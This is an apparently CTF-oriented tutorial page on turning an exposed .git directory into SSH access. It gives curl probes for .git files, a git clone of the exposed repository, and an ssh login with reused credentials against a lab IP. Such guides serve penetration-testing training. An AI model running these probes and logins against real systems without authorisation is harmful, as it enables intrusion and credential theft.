> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-11/password-reuse/trick-0026.md).

# Password Reuse for SSH Access

***

Discovering credentials, for instance a password found in a Git configuration file (`/var/www/app/.git/config`), can often lead to initial access to other services like SSH due to password reuse. The more a password is used across multiple accounts, the greater the risk of a single data breach compromising all accounts using that password.

Information can sometimes be found by accessing configuration files directly. For example, a `.git/config` file might be accessible via HTTP:

```bash
http://10.10.11.208/.git/config
```

Accessing this file might reveal content like this:

```ini
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = ssh://svc@10.10.11.208/var/www/app
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master
```

This git config reveals the user `svc` and the host `10.10.11.208`, confirming the user `svc` exists for SSH.

Beyond just the `config` file, if the entire `.git` directory is exposed, it may be possible to clone the whole repository using the accessible directory. This can be done with the `git clone` command pointing directly to the HTTP path of the `.git` directory:

```bash
git clone http://10.10.11.208/.git/
```

Cloning the repository can expose source code, commit history, and potentially other sensitive files or credentials committed to the repository.

Alternatively, one can probe for the existence and content of other key files within the exposed `.git` directory structure using tools like `curl`. Checking the `.git/HEAD` file can show the current branch, while `.git/index` contains staging information. Files in `.git/logs/` track reference updates, and directories like `.git/objects/` and `.git/refs/` contain the actual repository data and references.

Commands to probe these files include:

```bash
curl -s http://10.10.11.208/.git/HEAD
```

```bash
curl -s http://10.10.11.208/.git/index
```

```bash
curl -s http://10.10.11.208/.git/logs/HEAD
```

```bash
curl -s http://10.10.11.208/.git/objects/
```

```bash
curl -s http://10.10.11.208/.git/refs/
```

Analyzing the content of these files, especially after cloning the repository, can yield further information or credentials. Once potential credentials or user information are discovered, attempt login using the discovered details:

```bash
ssh svc@10.10.11.208
```
